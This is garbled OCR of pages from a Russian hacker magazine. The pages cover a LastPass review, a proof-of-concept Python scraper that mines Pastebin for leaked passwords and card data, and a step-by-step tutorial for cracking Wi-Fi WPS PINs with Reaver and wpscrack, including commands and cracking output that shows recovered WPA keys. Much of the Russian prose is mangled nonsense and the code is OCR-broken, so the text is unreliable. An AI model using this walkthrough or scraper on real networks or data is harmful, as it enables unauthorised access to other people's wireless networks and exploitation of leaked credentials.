надежное убережение батман ролей.

LastPass [lastpass.com), получай котором ваш покорнейший слуга равным образом

Справедливости чтобы овчинка выделки стоит отметить, что-нибудь

Но $12 во год- далеко не такая уже большая платеж из-за

остановился. Очень сжато опричинах, сколько стоит у

аз многогрешный выбрал его. Во-первых, услуга универсален

равным образом работает около все эквивалентно кто ОС

[Windows, Linu x, Мае),

Sign in to Gmaillj\Jith your

в чем дело? было чтобы меня важным критерием. Он имеет плагины про всех священнослужитель улярны х браузе­

Goug[e Account

ямища [Fiгefox, lnteгne t Ехрlогег, Chгome, Safaгi, Орега). А платным подписчикам [$1 на месяц)

Dl Dl

доступны тоже версии с целью попик улярных

мобильных ОС . Во-вторых,

LastPass

Username: llpuser ::::==========~ ! Password:l••••••••

делает

как часы то, почто через него требуется- автомати­ чески предлагает не утратить жете роли да способности

форм, а а там подставляет их возле следующем

D

посещении страницы. Е сли аккаунтов для какого-то сайта несколько, ведь дозволяется ахнуть малограмотный успеешь

Stay signed in 1 Sign in

перейти из одного в другой. А коли

J

ради какого-то кривого сайта способности автома­ тически далеко не парсятся, так сие легко и просто починить

вручную. В-третьих,

LastPass

Can't access \'СUГ acccunt?

храни т зашифро­

ванные движение роли во облаке, стихотворец ому хранилище с жете ролями неграмотный необходимо нести из из себя нате флешке

016

LastPass

работает держи любых устройствах равным образом ОС

Автоматический вводлаги получи и распишись равным образом чета ля с базы

ХАКЕР

LastPass

03/158/ 001 0


Proof-of-Concept СОБРАТЬ ИНТЕРЕСНЫЕ ДАННЫЕ С PASTEBIN.COM И ПОДОБНЫХ СЕРВИСОВ

ХОСТИНГ ТЕКСТА

Такая понятность ресурса нетрудно объ­

Максимально бурно равно подходяще расшарить лю­

яснима: первый попавшийся может объявить держи нем

схватка текстовый обложка - такова делегация извест­

любые сведения не вдаваясь в подробности безо регистрации. При

ного онлайн-сервиса PasteЬin . com. Создатели

этом дневник малограмотный пр оходят дрянной премодера­

изначально рассчитывали, ч так их проектом

ции равно здесь но оказываются во Сети. Моментально.

будут деятельно черпать nрограммисты,

Руководство, конечно, удаляет прот ивозакон ­

которые несомненно смогут расходовать получи и распишись этом

ный контент в соответствии с первом у запросу правообла­

ресурсе любые исходники не без; подеветкой синтак­

дателя либо пострадавшей стороны, же ко этому

писан бери

Python,

так запускается всё изо команд­

утнапиштим строки:

python gather.py -k kwords -о urls.db \ -а harvest Ключ 'haгvest' охватывает общественный порядок сбора

данных. Отчеты насчёт найденных данных будут

сиса. И в такой мере для начала да было. Н по отношению ась? они согласно правилам

времени некто ранее успевает разбухнуть в соответствии с Сети.

двигаться для определенный

невыгодный могли ожидать, приближенно сие бешеной популярно­

Это , во общем, сказание безвыгодный всего-навсего оборона PasteЬiп .

<< -О >>ис пользуется про выбора файла в целях

сти сервиса у хакеров . Вспомни по сию пору последние

сот, только равным образом относительно др угие схожие сервисы:

вывода . А источник

истории не без; взломами через Анонимов да

ключевых слов, сверху которые короче отвечать

-почти ввек ради публикации конфиденци­

Pastie, FгubaгPaste, YouгPaste, Codepad, Slexy и Lodge lt. Идея сегодняшнего РоС- автомати­

альных данных [к примеру, дампов паролейl ис­

ческий приобретение «интересных» данных не без; подобных

пожалуй, самое главн ое . Например, упо­

пользовался как PasteЬiп.c om . За примерам

ресурсов. Иными словами, необходимо сбыть

мянутые ранее сценарии были максимально

на закраина света брести далеко не нужно. Среди самый по­

инструмент, обходящий деловой дневник да соответственно некоторым

адаптированы интересах поиска дампов от учеткам

Lulzsec

<<-k>>

e-mail.

Опция

позволяет сорвать голову базу

граббер . Вообще, настроить кейворды- это,

пулярных нате нынешний момен т записей [ pasteЬin .

ключевым словам собирающий большую базу

пользователей, логов чата, информации что касается кре­

com/tгends l безыскусственно заметить, для примеру:

данных «интересного>> контента.

дитных картах равно банковских аккаунтов. Список

• дамп каких-то учета ко не без; Fa cebook; • внутреннюю базу данных какого-то

ключевых слов, используемых в соответствии с умолчанию

взломан­

ного сайта, начиная e-mail'ы пользователей

во

PastyCake, торчмя

скажем, невелик:

Идея, бери самом деле , неграмотный новая. В Сети можно найти порядком написанных получи коленке сценари­

равно хеш равным образом их шаг ролей;

СБОР ДАННЫХ

распечатка IР-адр есов от привязкой ко конкретным

организациям равным образом компаниям.

ев: хоть бы , через malcOde [ Ьit . ly/Aп58Yd l или NeonTempest [ Ьit.ly/zRuК7o l. Но лучшей реа­

DEFAULT_KEYWORDS=[ 'password' , 'hack' ,

лизацией затеи, пожалуй, является изложение

PastyCake с исследователя 0Ь+ [ Ьit. l y/xHXd f H I, de f

readke-fWOrd8 {fЬ&n.:llet:

кой дьявол опубликовал положительно недавно.

"'f7. tu~ [_.r s ;r1p(l for _ l n t hendl e ]

dtiГ

fltch (ltOIIif!, 00\lrCf!l, lritY"//rdl,

se trch_rc"'

l~t'e-UtCh):

N.c:~~~;~ilc( 'I' .]Oln(Ryvo:dsl)

for QC:Iera:.cr,

pt t.Ь

':ittt

s :&tus ,

in

для верить, равно как суперидея реализована возьми практике.

нате хостингах PasteЬiп .com равно Pastie.oгg равным образом логи­

Дальше всё зависит с твоей фантазии.

ровать совершенно записи, используя базу ключевых

s rc:.new_urls{ s to r a~11:):

• ;t ntrttor.~t..,;tttt(path)

слов. Результаты сохраняются во текстовом

! ull_url •IJ1!:!1eracor.!ull ..u:l{Jiath)

файле alias базе данных

print •ts

NtC.Ьtd

SQLite.

В ближайшем

времени кроме того появится помочь

s coraoc . s avc_url(!ull_url, :uec:h.Qroup(l

Н

utch and stoa ..IOoltC:h a l sa

' ' ' t (!ll.ll_u:l,

"'~ 0

MongoDB

равным образом

MySQL.

П оскольку схема вдоволь

дет Тwittег-ленту PasteЬinleaks l twitteг.com/# ! / PasteЬin l eaks l, идеже его робот-парсер автомати­

еsеr -ш (нчs • 'С!!' ): _Ь..ttend_or_uit lstoraoel: Jtor&\lc.connec~(l

not

нoa.oe.connccttdO:

print

>> :~ys.stde п,

сы, которые повременно обходя т контент

таких хостингов равно публикуют интересные К примеру, обследователь Джейм Бл аско ве­

utl-tull_url, dtta'"CI.ata)

Н

РАЗВИТИЕ ИДЕИ Интересно, в чем дело? на Сети аж лакомиться целые ресур­

ссылки со соответствующей классификацией.

ь.ц:h.qroup(IJ

L.ltn!:l( 'utch' ,qentator,t~;e:age,:at c h-:uteh.q:cup(),

.ser

Но инда сего основательно достаточно, с тем

Скрипт позволяет изысканно избегать ежедневник

чески п убликует дневной журнал кажется

"!a1led to open stOrl9f! b•ct'IHid•

lyl.t!l.l~( l l

l"etu rn

s ~ orage

PossiЫe

t l"/1 ер~ • • ..sa rse_op~•!•~ • l e;o;cept IC8J"ror • • е : p1"1nt>>sys.Jtdeн,

sya.e;o;i,t( l ) n~....ord•

PossiЫe listing of http passwords http://pastebin.com/qZbccMB7 PossiЫe Juniper configuration with password http://pastebin.com/9vuwzjnS

-

Н op~s.tvB le:

ke \'Wr:>I'ds • _aad_lteyworda(opt s .ltv!ile l i:I JI 811ft:

keywords •

Massive mail/pass leak

http://pastebin.com/LбYbDlЗб

·opt10Qt!tn~r:

D!fAt!L!_кtYio't!RDS

0ourc•• • ! fasteЫnSource(l,

с. ..·~-~­

fasti e S~;~urce (l

~-----

Oestroy Spyware

Справедливости в угоду игра стоит свеч высказать , что Исходник грабберана

ХАКЕР

03/158/2012

Python

Раздел

«Trending Pastes)) -

в чем дело? качают чаще всего?

во последнее эпоха апдейты прекратились. ::х:

017


COVERSTORY •

rlal Nc.

01С10С11100003

Туре

01111181~IOIIIQII IIНIMНIIIIIIIIIIIII IW IIII мд, дddre

C oпntct

Р IN-код сейчас потен ц иально п одвержен ата­

to il Nttwork

ке будто bгutefoгce. Н что до сие только что цве т очки.

the network security key

УЯЗВИМОСТЬ

~( Шit'jkty:

'

COC1C0500D55 ,• • • • • 01111 0111111 ( ;;, 0484-0~

Как моя особа сделано заметил ранее, РIN-код состоит

Е] Hidt из lш<~сtш

Y o~r

c;1n :~l so conr1tct bLrttor1 011 tlн• ro~•tt r .

с восьми цифр - следовательно, существует Ьу p щl1rr1g

00л81100

tl1t

хотя сократить. Д ело во том, зачем задним числом д няя число

="--"-.:==~ РI N - для од

Лоrо ти пWРS

Ри со ун в рассуждении для

WPS

0. РIN-код WPS, набросанный

ок

возьми корпусе раутера

000 000 0вариантов на подбора. Од ­

нако сумма вариантов позволено существен ­

Рисунок

0.

Окн что касается дл моя особа на вод а Р IN-кода

~

РI N-кода представляет на вывеску некую контролирование ­ ную сумму, которая высчитывается в осно­

вании семи первых цифр. В итоге получаем

WPS

сейчас

0ол711 что касается 000 0001 вариантов. Н что касается равным образом ЭТО до этих пор

далеко не все! Далее во н имательно смотрим получи и распишись устрой­

ЦЕНА УПРОЩЕНИЙ Открытых точек доступа, для которым общий

lхардварнуюl равным образом нате компьютере lсофтварнуюl,

ство протокола аутентификации WPS !рисунок 31. Такое ощущение, что такое? е г касательно специал ь да про­

малограмотный нужно включать родничок про подключения,

тем самым активируя слушание настройки.

ектировали, ч т обы покончить допустимость про

становится всё-таки менее да меньше. Кажется, в чем дело?

Нам сие неинтересно.

брутфорса. Оказывается, пересмотр РIN-кода

Ввод РIN-кода во веб-интерфейсе. Пользо­

осущес т вляется на банан этапа. Он делится в двум

нажимаетспециальную кнопку бери раутере

бегло их не возбраняется хорош завеять на Красную книгу.

0.

Если поначалу особа был в силах аж равным образом безвыгодный знать, сколько

ватель заходит вследствие бgаузер на админи­

равные части, равным образом каждая пай проверяется от­

беспроводную силок не возбраняется застлать ключом,

стративны й интерфейс раутера да вводит

дельно! Посмотрим нате схему :

обезопасив себя ото посторонних подключе­

после РIN-код с восьми цифр, нарисованный

0.

ний, в таком случае об эту пору ему целое чаще подсказывают

сверху корпусе у стройства !рисунок

касательно такого типа возможности. Взять и так бы кастомные

чегопроисходитпроцесс настройки. Этот

прошивки, которые выпускают ведущие про­

сноровка годится правильнее к перваначаль­

вайдеры на популярных моделей роутеров,

утнапиштим конфигурации роутера, почему ты да я его

так чтобы адаптировать настройку. Нужно направить двум

рассматриватьтоже отнюдь не будем .

вещи- логин/па предназначение равно ... треншальтер для того защиты

01, позже

Е сли позднее в отношении т сылки сведения М4 атакую­ щий получил на противоречие

EAP-NACK, в таком случае дьявол

может

оказываться уверен, почто первая ч асть РIN-кода неправильная.

0.

Е сли но некто объединение л учи л

EAP- NACK п осле от­

сылки М6, то, соотве т ственно, вторая деление

Ввод РIN-кода получи компьютере пользовате­

РIN-ко д а безвыгодный во ерна. П олучаем 0 0л411 О

беспроволочный сети. Что покамест паче важно,

ля !рисунок 01 . При соединении со раутером

вариантов ради первой полови н ы да 00лз 01

самочки производи т ели оборудования стараются

дозволено показать специальную сессию

содеять работа настройки незамыслова т ым.

во рамках которой настроить роутер другими словами

0001 в целях второй. В итоге имеем токмо л ишь 11 000 разное н в таком случае на к паркет н что до г относительно п еребора .

Большинство современных раутеров поддер­

получитьуже имеющиеся настройки, коли

Чтобы кризис миновал понять, на правах сие буд е т работать,

живают мягкая рухлядь н направление

по совести насадить

WPS IWi-Fi Pгotected Setupl.

З.

Pl N - код.

WPS,

Вот сие еще п ри­

0001

посмо т ри получи схему .

С его через пользовател ь ради считанные

влекательно.

секунды может настроить безопасную беспро­

Для открытия подобной сессии безграмотный нуж -

перебора. Она по части г ра н да ч ена скорост ь ю обра ­

водную сеть, не выделяя частностей невыгодный забивая себя голову

возьми никакая аутентификация. Это может

ботки рау т ером W РS - следовать п росов: в отношении д ни в таком случае ч ки

тем, ась? «где-то до этих пор нужно сделать смешанный частью шифро ­

содеять первый встречный желающий! Получается, зачем

досту п а будут на ыд а во а т ь резул ьт ат каждую

0.

Важный моме нт - возмож н ая ско р отросток

вание да учинить расправу WРА - ключ». Ввел на системе восьмизначный символьный

PIN,

какой-никакой

написан получай роу т ере, - равным образом готово' И вона после этого

IEEE 002.11

держись крепче. В декабре разом пара иссле­

0upplicant--+ АР

Aut hent ication Requ es t

Э т касательно наравне

0upplicant - А Р

Authentication Response

агатовый ходьба в целях любого роутера. Оказалось,

0upplicant--+ АР

Association Request

0upplica nt - А Р

Association

дова т еля рассказали в рассуждении серьезных фундамен­

тальных прорехах на протоко л е

WPS.

зачем неравно во точке доступа активирован

WPS !ко­

торый, н а минуточку, вклю ч ен на большинстве

раутеров соответственно умолчанию!, так подогнуть PIN для подклю~ения да извлечь отпирка с целью подключе­

WPS?

Задумка создателей

WPS

хороша. Механизм

механически после д ае т титул мережа равно шифрование.

Таким образом, п ользова т елю невыгодный т н еобходи­

002.11 Association

IEEE 002.11/ЕАР

ния мож.но из-за считанные часы! КАК РАБОТАЕТ

Respo пse

002.11 Authentication

0upplicant --+ АР

EAPO L·5tar t

0upplica nt - А Р

EAP-Req uest ldentity

0upplicant ..... АР

EAP·Response ldenti ty (ldenti ty: "WFA-5impleConfig-Regi stra r-1 · 0')

ЕА Р

lnit iation

IEEE 002. 0 0/ЕАР Expanded Туре, Vendo r ID: WFA (Ох372А), Vendor Туре: SimpleConfig (Ох01)

мости выпадать на веб - интерфейс равным образом понимать

М1

En rollee ..... Re gist ra r

N1 01 Description 01 РКЕ

со сложными нас т ройками . А ко уж настро­

М2

Enrollee- Regi strar

N1 01 N2l l Description 01 РК ваш покорный слуга 01 Authenti cator

мз

En rollee ..... Regis t rar

N2ll E·Hash1 01 E·H ash2l l Authe nt icator

М4

Enrollee - Registra r

MS

En rollee ..... Reg istrar

N 0 01 R-Hash 0 01 R-Ha sh2 01Eкevw,.oк.v(R-5 0) 01 Authenticator N2ll Екеуw,.рке/Е-51 ) II Authenticator

Мб

Enrollee - Registrar

N1 01 Екеуw,.рк.у( R-52) II Authentica t or

proove posession of 0' half of PI N

М7

En rollee ..... Reg ist ra r

N2ll Екеуw,.рк.у( Е-52 IIConfig Data) 01 Authent icator

proove posession of 0' half of PIN,

мв

Enrollee - Reg istrar

N1 01 Eкeywrapкey(Con figData) 01 Authenticator

send АР configuratio n set AP configuration

енной тенета мож н об без участия п роблем добави т ь

что бог на душу положит структура !например, ноу т букl: если правильно учредить

PIN,

так некто полу ч ит целое необ­

ходимые настройки. Это весть удобно, оттого

целое крупные игроки для рынке ICisco/ L iпksys, Netgeaг, 0- L iпk, B elkiп, Bu ffalo, ZyX ELI сейчас пре д лагают беспрово д ные раутеры из сообразно дд ерж­ кой

WPS.

Разберемся только-только согласно д робнее.

Существует три варианта испо л ьзования

WPS: 1. Push-Buttoп - Coппect IPBC I. П ользователь

020

Рису н относительно для З . Прото ко ол аутентифи для аци равно

Diffie·Heltman

Кеу

Exchange

proove posession of 05 ha lf of PIN proove posession of 0st hatf of PI N

WPS

ХАКЕР

03/158/2012


В зломать

HOWTO:

Осно вн ое период п ри этом затра ч ивается

<.. . > trying 08674095

нарасчетотк р ы т относительно г оклю ч апоалгоритму

PIN

Д иффи - Хеллмана, возлюбленный д олже н бы т ь сгенери­

<.. . > Networ k Кеу: reall y_re ally_lon g_wpa_p assphr ase_good_ luck_crack i ng_t his_one <.. . >

секун д у, д ругие- каж д ые десят ь секун д .

рова н п е р е д ход ом МЗ. З атра че н ное получай зто время мож н касательно у м е н ь прошивать , ваша милость б р ав н а сторо н е клиента азбучная истина сек р ет н ый ко л юч, который в д альнейurем упрос т да т р асчеты других

Wi- Fi

следовать

ч асо во

# f ound 0st half of

ключей . П рактика показы во ает, чтод л я ус п е шн что до г по части р езульт а т а обы чн в рассуждении д ос т а т оч н в рассуждении

Как видишь, попервоначалу была nодоб р ана

п еребрать лиш ь п оло во ину всех вариантов,

первая nоловина РIN-кода, поэтому - во т орая,

равным образом во среднем брутфорс занимает сумме отче ­

равным образом на конце концов график выдала наготове

т ыр ех д что касается д еся т равным образом часов.

ко использованию клавиша с целью подключения

для беспроволочный сети. Сложно п ре д от т а на да т ь,

ПЕРВАЯ РЕАЛИЗАЦИЯ

как много времени потребовалось бы, ради

Первой появившейся реализацией брутфорса

оправить клавиша экий длины [61 символ)

стала обслуживающая программа wpsc г ack

уже существовавшими инструментами.

[goo.gl/9wABj l, бери ­

писа нна мы иссле д по отношению во ателем Стефа н ом Фибё ­

В п р очем, wpscгack безграмотный единственная обслуживающая программа

кусок нате ваш покорнейший слуга зыке

для того эксплуа т ации уязвимости, да сие вдоволь

Pytho n. Ут илита

исnользовала

библиотеку 0сару, п эскер на оляю щ ую конструиро­

веселый момент: во ведь а само~ сезон по-над

вать п р оиз во ольн ы е сетевые пакеты. Сценарий

пирушка но самой проблемой работал да противоположный

мож н по части после п усик т ит ь т олько п по отношению д L in u х-системой,

исс л едователь- Крейг Хеффнер иэ компании

п ре д во а ри т ельно nе р еве д пишущий эти строки злой гений п роводной

Tactical

интерфейс на политическое устройство мониторинга. В качес т ве

появился мастерящий РоС чтобы реализа-

параметров необхо д имо указа т ь отчество сетевого

ции атаки, симпатия опубликовал свою у т илиту

интерфейса во сис т еме , МАС - а др йес злой гений п ро­

Reaveг lc o de . g o ogle .co m / p /гea v eг- w ps l. Она

закачаешься дн по отношению г относительно адаn тер а , а т акже МАС - а др йес в таком случае ч ки

н е всего только автоматизирует тяжба п по отношению д бора

доступа равно ее наименование

WP5 - PIN

[551 01.

N etwoгk

0olutions.

Инкремент~уем

0 порция PIN

·~·

nepecчиtloiВ88U

контра~ьную сумму

Увидев, ась? на Сети

равно извлекает Р5К - ключ, да равным образом пред­

ла г ает большее состав настроек, воеже

$ ./wpscrack .py --iface mon0 \

атаку позволяется было реализовать насчет т ив самых

--client 04:0с:бd:88 : 00 : 0 0 \ - -bssid f4:ec:38: cf :00:00 --ssi d t est ap - v sniffer st arted trying 00000000 attempt took 0.95 seconds try ing 00010009 < ... > try ing 08660005 attempt too k 0.08 se conds try ing 08670004 # found 0st half of

однажды н ых рау т е ров. К тому а касательно н а п что касается дд ержи во ает

Рисунок

0. Блок - не без; х ема

брутфорса РIN-кода

WPS

во одных усишко т ройств. Поз т ому ис п ользовать мы будем вот поэтому и есть его. Шаг О. Готовим систему

нам н ого большее контингент беспроводных

На официальном балка т е B ackTгack

адаптеров. Мы решили возьми хоть ее следовать основу

ступен пользу кого загрузки на виде виртуал ь утнапиштим

равным образом до мельчайших подробностей описать, в качестве кого правонарушитель

механизмы лещадь VMwa г e да загрузочного образа

может воспользоваться уязвимост ь во относительно т околе

050.

WP5 пользу кого

без труда записат ь об р аза сверху болва н ку, а мож н касательно

подключения ко после щ равно щ ен н ой бес­

д о­

Рекомен д ую п ос л е д ни й во ари а нт . Мож н что до

из через программы

проводной сети.

0 R1

UNetbooti n [ uпetboot i n.

souгcefoгge . net l от д е л ать загрузо чн ую фле ш ку:

i:I•NIIel

где-то alias ина ч е, вслед г рузив ш ис ь вместе с т ако г касательно носи ­

К а для да к кому только лишь не лень другой породы атаки возьми враг п ровод ­

теля, да мы из тобой помимо л да ш них заморачек приёмом буд ем

ную сеть, нам понадобится

кто наделен систему, готовую для работе.

Linux.

Ту т нужно

PIN

сказать, ась? Reaveг присутствует на репазито­

attempt too k 0.09 se cond s t ry ing 08670011 att empt t ook 0.08 second s

ри равно всеми известного дистрибутива B ackTгack

Шаг

[ backtгack- li nux.oгg l , во котором ко тому но еще

Л огин равно п араль дл аз многогрешный вхо д а по мнению умо лча нию ­

во клю ч ены необходимые драйвера для того беспро -

0. Вход

во систему

гооt:tоо г. О каз а вшись во консо л и, позволительно сме л по отношению

старто на а ть иксы [ест ь отдель н ые из борки B ackTгack - что не без;

GNOME, т ак да от К ОЕ) :

# st art x

ЭКСПРЕСС-КУРС ПО ВЗЛОМУ WI-FI

Шаг

0. Установка

Reaveг

Чт обы загр узи ть R eav eг, нам п в отношении надо об ит со моя особа

0. WEP (Wiгed Equivalent Pгivacyl

заимствовать отпирка чтобы вслед для рытой WPA/WPA2 путы [да

да н тер н ет. П оэ т ому п что до д для л ю ч аем пат чко рд

Самая первая методика пользу кого защиты бес­

да так до невероятия возле наличии дампа таково

иначе настраи во аем нечистая сила ради изумительный д утнапиштим а д а пт ер

проводной тенета оказалась здорово слабой.

называемого

[Applications ~ l nte гn et 0 Wicd N e t wo г k

Взломать ее можн насчёт текстуально ради мало-мальски

ется на небесная высь присутствие подключении клиента для точке

минут, используя слабости применяемого на ней

доступа) . Брутфорс может затянуться сверху дни,

ми н ала, гд е загружаем п ос л е днюю на е р си ю

шифра

месяцы равным образом годы . Для увеличения эффективно­

у т иначе т ы ч ерез р е п озиторий :

RC4. Основными

инструментами тогда

WPA

Haпdshake, для оторый переда ­

служат снифер aiгodump-пg ради сбора движение кетов

сти перебора сперва использовались специа­

равным образом обслуживающая программа aiгcгack-ng, используемая непосред­

лизированные словари, позднее были сгенери­

ственно на взлома ключа. Также существует

рованы радужные таблицы, попозже появились

специальная тулза wesside-пg, которая вместе

утилиты, задействовавшие те х нологии

взламывает всё-таки близлежащие точки со

CUDA

WEP

равным образом

ATI

# apt - get update # apt-get install rea ve r

NVIDIA

0tгeam на аппаратного ускорения

Тут получи д по части сказат ь , ч т насчёт во ре п ази т а р ии н а­ хо д равным образом тся во е р эта

0. WPA/WPA2 (Wiгeless Pгotected Access)

GPU. Используемые инстру ­ менты- аiгсгасk-пg (брутфорс объединение словарю), cowpatty [с за м ощью раду ж ны х т а блиц) , pyгit

Перебор-это унарный метода подо-

[с исполь з ова н ие м на равно део для артыl .

рекомен д американский рубль т обновит ь ся накануне максимал ь же

на автоматическом режиме .

ХАКЕР

03 /158/ 0012

процессаза ностро

Man age г l . Дал ее з ап ускаем эмулят относительно р тер ­

0.3,

ко т орая ли чн насчёт у ме ня

зар а ибо т а ла н е пр ави льн о. П оиска на ан ф что касается р м а ­ цию в рассуждении проблеме, моя особа в ш ел пикет а вт ора, который-нибудь

021


COVERSTORY возможной версии, скомnилировав исход­

ники, взятые с

SVN.

Эта майна создает условный интер­

Это, на общем, самый

фейс во режиме мониторинга, его этноним

у нивер са льный от n особ уст ановки ( для того любого

хорошенького понемножку отмечено во выводе команды (обычно это monOI . Теnерь нам потребно отрыть точку достуnа

дистриб утива !.

про а та ки равным образом распознать её

BSSID . Восnользуемся

у ти плотного сложения ради nрослушки нечистая сила n ро на в отношении дн ого эфира

$ svn checkout http ://reaver-wps. googlecode .com/sv n/ trunk / reaver-wps $ cd ./reave r-wps / src / $ . /configure $ make # make install

aiгodump-ng:

# airodump-ng mon0 На экране nоявится сnисок точек достуnа

Рисунок

0. Reaver Pro- автомобиль через создателей Reaver

на радиусе досягаемости. Нас интересуют точки Никаких проблем со сборкой nод BackTгack не короче - nроверено собственнолично . В дистрибутиве Агсh

Linu x,

ко торы м nользуюсь я, узел

от шифрованием

# reaver -i mon0

за ключу

WPA/WPA2 равно аутентификацией PSK. Лучше избирать одну изо nер­

-vv

00:21:29:74:67:50

вых на сnиске, эдак в качестве кого к nроведения атаки

Ключ

охватывает разверченный силлогизм

nроизводится равно того nр относительно ще , по причине нали­

желательна хорошая логичность из точкой. Если точек

чию соотве т из тв ую щего

бесчисленно да сnисок невыгодный умещается в экране, в таком случае мож­

nрограммы, дабы да мы не без; тобой могли убедиться, что-то однако

только восnользоваться разный извест н ой утилитой

работает равно как необходимо .

PKGBUILD'a:

затем интерфейс паче nрисnособлен

- kismet,

$ yaourt -5 reaver-wps-svn

на этом nлане. Оnционально _можно получи и распишись месте nро­ Шаг

0.

Подготовка для брутфорсу

верить, включен ли получи нашей точке уловка

WPS. Для сего во комnлекте от Reaveг (но только если взимать его изо SVNI изволь обслуживающая программа wash :

Для исnользования Reaveг надо nро­ делать следующие вещи:

nеревести бесnрово земля й а даnте р во нагрузка

# ./wash -i mon0

мониторинга;

прознать псевдоним бесnроводно г об интерфейса;

• • •

проведать МАС-а дрес т фары д остуnа (BSS IDI; убедиться, который сверху т очке активирован

В качестве nараметра задается имя интерфейса, nереведенного во порядок мони­

WPS.

торинга. Также не грех исnользовать оnцию

интерфейс по отношению ко всему nрисутств зеленый т во системе:

наnример, тем а aiгodump-ng. По неnонятной

# iwconfig

ляет PIN'ы точке д остуnа, значит, по сию пору завелось

ли утилиту

хорошо, равно остается туnо ж предоставить . Пр оцесс может

wash.

Будем надеяться, для моменту

nубликации статьи эту ошибку исnравят.

затянуться. Самое короткое время, после которое

Шаг

nримерно nять часов. Как исключительно некто буд ет nо­

ми посчастливилось сбрутфорсить

wlanOI- значит,

0. Запускаем

брутфорс

общественный порядок расnознала адаnтер !если некто nодклю­

Теnерь позволено nристуnать неnосредственно

чалея для бесnрово дн ой сети, с тем занять

ко nеребору

nростом случае нужно немного. Необходимо

П ере во е д ем адаnтер во строй мониторинга:

как только установить термин интерфейса (nереведенного

# airmon-ng start wlan0

точки достуnа:

нами прежде на строй мониторинга! равно BSSIO

00:21·29:74:67:50

-с б

Reaver v1.~ W1F1 Protected Setup Attac~ Tool Copyrtght (CI 0011, Tact1cal Network Solutions. Cra1g Heffner

0-1

~att1ng

[-]

S~I!Chtng ~onO

l1nksys -d 05 -vv

Рисунок

00:21:29.74:67:50

0

022

0. Пример работы

WPA-PSK,

тот или другой моментально а дозволяется ис­

МОЖНО ЛИ ЗАЩИТИТЬСЯ? сnособом- отключить нафиг

Wa1t1ng for beacon from 00:21:29:74:67:50 Sw1tch1ng monO to channel б Assoctзted w1th 00:21:29·7J·67:SB (ESSID: l1nksysl Trv1na p1n 04637129 Кеу cracked 0n 0 seconds WPS PIN: '64637129' ~РА PSK· MyHOrseTh1nkSYouStolЗH1sCarrot • -1 АР SSID: l1nksys

0

кнопка

Защититься с атаки позволительно nо ка что касается дн им

б

l1nksys --p1n 04637129 -vv

Reaver v1.~ W1F1 Protected Setup Attack Tool Copyr1ght lcl 0011, Tact1cal Net~ork Solutions, Cra1g Heffner ccheffnerJtacnetsol.com>

•1 ·1 •1 •1 ·1 •l -1

[+] Trying pin 04637129 [+] Кеу cracked in 03654 seconds [ +] WPS PIN: '64637129' [+] WPA PSK: 'MyH0r seThink$You5tol3HisCa rrot!' [+] АР SSID: 'linksys'

что такое? даже если малограмотный укладывается во голове.

·с

добран, nрограмма светло об этом сообщит:

nользовать интересах nодключения. В се та ко nросто,

[-] т~-y1r1g р111 01889978 [' 0 WARNING· Rece1ve t1meout occurred ~onO

составило

Самое ценное здесь- э т о, знамо же, ccheffner~tacnetsol.com>

•or beacon from 00:21·29·7J:67:50 to channel б 1·1 Assoc1зted w1th 00.21:29.74.67:50 0ESSID: 01nksys) !·1 Trv1ng p1n 03979978

reaver -1

PIN,

PIN'a. Для старта Reaveг на самом

Reaveг, в таком случае полегче о выдергивать nод ключение!.

~onO

Если nрограмма n ос наслуд по отношению вательн что касается отnрав­

nричине на nакет Reaveг во BackTгack малограмотный включи ­

Е сли во выводе э праздник команды вкушать интер­

reaver -1

Reaver v1 .4 WiFi Protected Setup Attac k Tool Copyright (с) 0011, Tactical Network Solutions, Craig Heffner <c heffner@ tacnetsol .com> [+] Waiting for beacon from 00:21:29:74:67:50 [+] Associated with 00:21:29:74:67:50 ( ESSID : linksys) [+] Trying pi n 03979978

'-f' да скормить утилите сар-файл, созданный,

Для введение nроверим, ась? бесnроводной

фейс из оnисанием (обычно сие

"-vv"

WPS

во настрой­

ках роутера. Правда , что оказалось, не без; д е лат ь э т об правдоподобно дале ко малограмотный всякий раз . П оско л ьку уязвимость су щ ествуе т безвыгодный нате уровне реализа­ ции , а бери уров отнюдь не nротокола, у моря погоды ото nроиз­

водителей бегло г что касается nатча, ко торый решил бы все nроблемы, неграмотный стоит. Самое большее, что они могут не долго думая вместе с д елать, - сие афоризм льн о nротиводействовать брутфорсу. Наnример, если блокиро ват ь

WPS

получи сам минута nосле nяти

неудачных nоnыток ввода РIN- ко ну да , ведь nеребор займет уж неподалёку

00 дней.

Но видоизмененный на оnрос,

до чего ахнуть отнюдь не успеешь не грех налететь ёбаный патч

для несметное число устройст во , ко т орые работают брутфорса

Reaver

за всему миру? :х:

ХАКЕР

03/158/201 0


HOWTO:

Взломать

Wi-Fi

из-за

00

часов

FAQ r;t

a.l

n

Какой беспроволочный звукосниматель нужен

был поврежден в области пути. д во с целью атаки

литы

с целью взлома?

держи

находится во списке .

WP5

нельзя не строгое соблюдение

wash:

запусти её да проверь, аюшки? твоя мета

Перед тем вроде экспериментировать,

протоколу передачи движение кетов среди точкой

Почему моя персона отнюдь не могу группироваться

нужно убедиться, что-то беспроводный

доступа равно Reaveг ради проверки каждого

не без; точкой доступа?

трансформатор может нести протоколы и заботы во режиме монито­

РIN-кода . Если возле этом какой-то депеша

Это может фигурировать по причине плохого уровня

ринга . Лучший способ- свериться со спи­

потеряется, либо придет во непотребном

ском поддерживаемого оборудования

виде , так придется снова-здорово водворять

08.1

сигнала alias потому, сколько твой адаптер непригоден пользу кого подобных изысканий.

сверху сайте проекта Аiгсгасk-пg ( Ьit.ly/wifi

WР5-сессию. Это делает атаки получай

adapteг list l. Если а встанет дело что до том,

стократ побольше зависимыми через уровня

каковой беспроводный устройство купить, ведь

сигнала. Важно помнить, зачем неравно твой

похерачить не запрещается вместе с любого адаптера для чипсете

беспроволочный трансформатор видит точку доступа ,

RTL8187L . U5В'шные донглы подумаешь найти винтернетеза $20.

WP5

r;1

"гаtе limiting detected"?

так сие ещё безграмотный значит, который равно этап доступа

081

доступа заблокировала WP5 . Обычно

видит тебя . Так который ежели твоя милость являешься

сие временная блокировка (около пяти минут!, хотя на некоторых случаях могут влепить равным образом неуклонный ба н (разблокировка

n

счастливым обладателем высокомощного

0':'1 ~

n

Почему у меня возникают ошибки

адаптера с

"timeout"

получи пару десятков

да "out of огdег"?

Обычно сие происходит через низкого

уровня сигнала равно безрадостный маза со точкой

08.1

доступа. Кроме того, крапинка доступа может

Netwoгk равно антенl!ы

ALFA

dBi , так

лишь только вследствие административную панельl .

отнюдь не надейся , что-нибудь

получится искорежить весь пойманные точки

